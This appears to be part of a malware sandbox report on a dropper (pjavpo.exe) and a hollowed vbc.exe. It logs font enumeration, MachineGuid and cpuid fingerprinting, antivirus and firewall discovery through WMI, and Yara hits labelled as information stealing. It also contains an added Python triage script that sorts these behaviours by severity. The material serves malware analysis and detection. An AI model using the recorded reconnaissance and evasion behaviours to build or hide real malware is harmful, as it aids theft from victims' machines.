                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Code function: 3_2_00412BFC cpuid
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Code function: 3_2_0040F05A GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 12_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
                Source: C:\Users\user\Desktop\TGQfHfehsY.exe Code function: 1_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
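                The behaviour listing above mixes a few hundred font-file volume queries (a side effect of GDI+/System.Drawing font enumeration in the .NET stage) with a handful of lines that actually matter for attribution and detection: the MachineGuid read used as a victim identifier, the cpuid probe, the root\SecurityCenter2 AntivirusProduct/FirewallProduct discovery, and GetComputerNameA/GetUserNameA issued from the hollowed vbc.exe rather than from the dropper. The script below is an added triage example, not Joe Sandbox code and not part of this report; it parses lines in the report's layout (tolerating the fused "...exeQueries" form that text extraction produces), classifies each one, and buckets them by a severity weighting that is the editor's own, not a field the sandbox emits. The sample lines are constructed for the example, and the rule that the GetSystemTimeAsFileTime/GetCurrentThreadId/GetCurrentProcessId/QueryPerformanceCounter sequence is the MSVC CRT stack-cookie initialiser is the editor's assumption about that function, not a finding of the report.

```python
import re
from collections import defaultdict

# Constructed sample lines in the layout the report uses (not copied from the
# sandbox). Both the fused "...exeQueries" and the spaced form are accepted.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation",
    r"Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation",
    r"Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Code function: 3_2_00412BFC cpuid",
    r"Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid",
    r"Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Code function: 3_2_0040F05A GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,",
    r"Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 12_2_0040724C memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,",
    r"Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct",
    r"Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct",
]

# "Source: <exe path><behaviour kind>: <detail>"; the source path ends in .exe,
# so the kind can follow it with or without a separating space.
LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?\.exe)\s*"
    r"(?P<kind>Queries volume information|Code function|Key value queried|WMI Queries)"
    r":\s*(?P<detail>.+?)\s*$"
)

# Assumption: this API sequence is the MSVC CRT __security_init_cookie seed,
# present in every MSVC-built binary, so it carries no signal on its own.
CRT_COOKIE_APIS = {"GetSystemTimeAsFileTime", "GetCurrentThreadId",
                   "GetCurrentProcessId", "QueryPerformanceCounter"}


def parse_line(line):
    """Return (process basename, kind, detail), or None for headings/residue."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    proc = m.group("source").rsplit("\\", 1)[-1]
    return proc, m.group("kind"), m.group("detail")


def classify(kind, detail):
    """Map one record to (category, severity); severity is the editor's weighting."""
    if kind == "Queries volume information":
        # Font enumeration touches every file under Fonts: one event, not hundreds.
        return ("font-enumeration", "noise") if "\\Fonts\\" in detail else ("volume-query", "low")
    if kind == "Key value queried":
        # MachineGuid is a stable per-install GUID, the usual bot/victim identifier.
        return ("host-fingerprint:MachineGuid", "high") if detail.endswith("MachineGuid") else ("registry-query", "low")
    if kind == "WMI Queries":
        return ("security-product-discovery", "high") if "SecurityCenter2" in detail else ("wmi-query", "low")
    # Code function detail is "<pid>_<stage>_<addr> api1,api2,..."
    _func_id, _, api_field = detail.partition(" ")
    apis = {a for a in api_field.split(",") if a}
    if "cpuid" in apis:
        return ("hardware-fingerprint:cpuid", "medium")
    if {"GetComputerNameA", "GetUserNameA"} & apis:
        return ("host-identity-collection", "high")
    if CRT_COOKIE_APIS <= apis:
        return ("crt-security-cookie-init", "noise")
    return ("code-function", "low")


def triage(lines):
    """Bucket behaviour lines by severity; entries are (process, category, detail)."""
    buckets = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # headings, blank lines, page residue
        proc, kind, detail = rec
        category, severity = classify(kind, detail)
        buckets[severity].append((proc, category, detail))
    return dict(buckets)


def processes_by_category(lines):
    """Which process did each medium/high behaviour: separates the dropper from
    the hollowed vbc.exe that does the identity collection."""
    out = defaultdict(set)
    for severity, entries in triage(lines).items():
        if severity in ("high", "medium"):
            for proc, category, _ in entries:
                out[category].add(proc)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for severity, entries in sorted(triage(SAMPLE_LINES).items()):
        print(f"{severity}: {len(entries)} line(s)")
    for category, procs in sorted(processes_by_category(SAMPLE_LINES).items()):
        print(f"  {category}: {', '.join(procs)}")
```

                Run against the full behaviour export of a report, the noise bucket absorbs the font queries and the CRT cookie initialiser, and the high bucket is left with the four behaviours worth turning into hunts: a registry read of MachineGuid, WMI queries into root\SecurityCenter2, and GetComputerNameA/GetUserNameA from a process name (vbc.exe) that has no business collecting host identity.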

                Stealing of Sensitive Information

                Source: Yara match File source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara match File source: 12.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 12.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
